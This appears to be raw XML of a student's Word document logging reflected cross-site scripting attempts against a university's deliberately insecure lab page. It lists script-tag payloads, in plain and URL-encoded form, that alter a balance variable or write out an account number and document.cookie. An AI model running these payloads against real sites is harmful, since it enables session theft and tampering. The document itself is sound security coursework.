          <w:p w14:paraId="00D32BAF" w14:textId="50A0C8AB" w:rsidR="003420DE" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="00913622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14:55:46 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003420DE" w14:paraId="6A3FB97F" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04700013" w14:textId="25401D83" w:rsidR="003420DE" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="003420DE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Tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57BF8AE1" w14:textId="6CF1E606" w:rsidR="003420DE" w:rsidRPr="00FF34D2" w:rsidRDefault="003420DE" w:rsidP="00913622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14:56:03 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00276DBA" w14:paraId="6F124B35" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07B7D3DB" w14:textId="368CC916" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA" w:rsidP="003420DE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&lt;script&gt;\</w:t>
            </w:r>
            <w:proofErr w:type="spell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nbalance</w:t>
            </w:r>
            <w:proofErr w:type="spell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proofErr w:type="gram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10000000000;\</w:t>
            </w:r>
            <w:proofErr w:type="gram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n&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32472990" w14:textId="178DE008" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA" w:rsidP="00913622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15:10:54 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00276DBA" w14:paraId="60F74F3F" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075E8870" w14:textId="472F325B" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA" w:rsidP="00276DB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&lt;script&gt;\</w:t>
            </w:r>
            <w:proofErr w:type="spell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nbalance</w:t>
            </w:r>
            <w:proofErr w:type="spell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proofErr w:type="gram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10000000000;\</w:t>
            </w:r>
            <w:proofErr w:type="gram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n&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A4E523" w14:textId="21DEAD07" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA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15:11:34 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00276DBA" w14:paraId="25E3C381" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D0DBB6" w14:textId="77777777" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA" w:rsidP="00276DB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%3Cscript%3E%5Cnbalance%3D10000000000%3B%5Cn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333D69DA" w14:textId="66AE1E64" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA" w:rsidP="00276DB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%3C%2Fscript%3Etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5612AF81" w14:textId="353365CE" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA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15:12:41 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F7E67" w14:paraId="7BBFF7CC" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02D6A910" w14:textId="2718ED4B" w:rsidR="008F7E67" w:rsidRPr="00FF34D2" w:rsidRDefault="008F7E67" w:rsidP="00276DB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&lt;script&gt;balance=10000000;&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00208CA3" w14:textId="7ABCB614" w:rsidR="008F7E67" w:rsidRPr="00FF34D2" w:rsidRDefault="008F7E67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15:26:51 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F7E67" w14:paraId="75C232AA" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580098BA" w14:textId="51C9B76D" w:rsidR="008F7E67" w:rsidRPr="00FF34D2" w:rsidRDefault="008F7E67" w:rsidP="00276DB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&lt;script&gt;balance=100000000;&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29EFF622" w14:textId="5479F02C" w:rsidR="008F7E67" w:rsidRPr="00FF34D2" w:rsidRDefault="008F7E67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15:28:28 -0400</w:t>
            </w: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66454B" w14:paraId="009A9502" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434AE2B1" w14:textId="77777777" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B" w:rsidP="00276DB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hyperlink r:id="rId4" w:history="1">
              <w:r w:rsidRPr="00FF34D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https://andromeda.cs.virginia.edu/~insecure/xss.php</w:t>
              </w:r>
              <w:r w:rsidRPr="00FF34D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?name=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4147A8E6" w14:textId="13446E5F" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B" w:rsidP="00276DB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%3Cscript%3Ebalance%3D100000000%3B%3C%2Fscript%3Etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752752A6" w14:textId="35347639" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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15:40:38 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0066454B" w14:paraId="35D984F6" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0076CDA4" w14:textId="77777777" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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hyperlink r:id="rId5" w:history="1">
              <w:r w:rsidRPr="00FF34D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https://andromeda.cs.virginia.edu/~insecure/xss.php?name=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="24AD258C" w14:textId="68BBAFA4" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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%3Cscript%3Ebalance%3D100000000%3B%3C%2Fscript%3Etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21863CDC" w14:textId="4FF1940A" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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15:41:21 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0066454B" w14:paraId="2761A38D" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C17B655" w14:textId="09DAB8E0" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00F46FFE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Pr="00FF34D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https://andromeda.cs.virginia.edu/~insecure/xss.php?name=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1039D3FB" w14:textId="2AE77246" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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%3Cscript%3E%5Cnbalance%3D100000000%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D38CC25" w14:textId="7595D5D9" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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3B%5Cn%3C%2Fscript%3Etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06FCB2BD" w14:textId="27D3D120" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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15:45:06 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F46FFE" w14:paraId="650E9E67" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44895072" w14:textId="5828364D" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00F46FFE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Pr="00FF34D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https://andromeda.cs.virginia.edu/~insecure/xss.php</w:t>
              </w:r>
            </w:hyperlink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14:paraId="335DCC65" w14:textId="1D3CE77C" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00F46FFE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=%3cscript%3ebalance%3d100000000%3b%3c%2fscript%3etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30771FE0" w14:textId="574771B4" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00F46FFE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15:52:21 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00271EB0" w14:paraId="2C07D77D" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0587F5AB" w14:textId="42FD6DF8" w:rsidR="00271EB0" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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&lt;script&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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document.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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accountNumber</w:t>
            </w:r>
            <w:proofErr w:type="spell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);&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE85B6A" w14:textId="47EFFD89" w:rsidR="00271EB0" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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16:12:36 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D756E9" w14:paraId="2D57399F" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="028843EC" w14:textId="6791EAD9" w:rsidR="00D756E9" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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Pr="00FF34D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https://andromeda.cs.virginia.edu/~insecure/xss.php?userid=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="46BED44D" w14:textId="6D12BA76" w:rsidR="00D756E9" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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%3cscript%3edocument.write(accountNumber)%3b%3c%2fscript%3etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21E37048" w14:textId="0C1835B6" w:rsidR="00D756E9" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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16:17:35 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F2F09" w14:paraId="04434B8E" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63B13BF6" w14:textId="49C1EF67" w:rsidR="003F2F09" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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&lt;script&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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document.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spell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);&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21563BDD" w14:textId="49EEBECB" w:rsidR="003F2F09" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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16:34:18 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7FFC" w14:paraId="79A1CCD2" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33082714" w14:textId="4419995F" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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Tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD006CD" w14:textId="1335CAD8" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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16:34:40 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7FFC" w14:paraId="03CD4891" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="576C54D1" w14:textId="215C68F9" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidRPr="00FF34D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https://andromeda.cs.virginia.edu/~insecure/xss.php?userid=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1793A651" w14:textId="18CEFA7D" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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%3cscript%3edocument.write(</w:t>
            </w:r>
            <w:proofErr w:type="gram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document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gram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)%3b%3c%2fscript%3etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16603490" w14:textId="0C2158B0" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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16:36:37 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7FFC" w14:paraId="244F1F3E" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A5A6761" w14:textId="102FC426" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2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hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidRPr="00FF34D2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https://andromeda.cs.virginia.edu/~insecure/xss.php?userid=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="61BF34E3" w14:textId="05BD4DB2" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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%3cscript%3edocument.write(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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)%3b%3c%2fscript%3etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F5CC06D" w14:textId="551EC045" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2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16:42:04 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF34D2" w14:paraId="686E1FC0" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1F07CD" w14:textId="1DD79F44" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2" w:rsidP="0066454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Tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177B18AB" w14:textId="7CB8FDF5" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2" w:rsidP="00276DBA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16:42:21 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF34D2" w14:paraId="0409AA30" w14:textId="77777777" w:rsidTr="00FF34D2">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5935" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3324EEBB" w14:textId="271A70DB" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2" w:rsidP="00FF34D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&lt;script&gt;balance=100000000;&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AE73C86" w14:textId="017878C2" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2" w:rsidP="00FF34D2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D2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>This page served at Sun, 26 Mar 2023 16:42:59 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71F5196F" w14:textId="5520B5CD" w:rsidR="00B11099" w:rsidRPr="00B11099" w:rsidRDefault="00D756E9" w:rsidP="00B110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Number: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D756E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2625059562</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46562E" w14:textId="77777777" w:rsidR="00FF34D2" w:rsidRPr="00B11099" w:rsidRDefault="00FF34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F34D2" w:rsidRPr="00B1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5E"/>
    <w:rsid w:val="000411EE"/>
    <w:rsid w:val="000F6FCC"/>
    <w:rsid w:val="00271EB0"/>
    <w:rsid w:val="00276DBA"/>
    <w:rsid w:val="00332CE7"/>
    <w:rsid w:val="003420DE"/>
    <w:rsid w:val="00365D9E"/>
    <w:rsid w:val="003C7FFC"/>
    <w:rsid w:val="003F2F09"/>
    <w:rsid w:val="0066454B"/>
    <w:rsid w:val="00730769"/>
    <w:rsid w:val="008F7E67"/>
    <w:rsid w:val="00913622"/>
    <w:rsid w:val="00AA15D9"/>
    <w:rsid w:val="00AF0EF3"/>
    <w:rsid w:val="00B11099"/>
    <w:rsid w:val="00B1285E"/>
    <w:rsid w:val="00BB2EC5"/>
    <w:rsid w:val="00D756E9"/>
    <w:rsid w:val="00E81349"/>
    <w:rsid w:val="00F14B6B"/>
    <w:rsid w:val="00F46FFE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6C3C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{78CBB06C-04FF-4C77-A136-2FE7E6B0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85E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="000F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4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meda.cs.virginia.edu/~insecure/xss.php?userid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dromeda.cs.virginia.edu/~insecure/xss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dromeda.cs.virginia.edu/~insecure/xss.php?name=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dromeda.cs.virginia.edu/~insecure/xss.php?name=" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/xss.php?userid=" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/xss.php?name=" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andromeda.cs.virginia.edu/~insecure/xss.php?user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Kim, Tyler Yosep (tkj9ep)</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-26T02:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-26T20:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>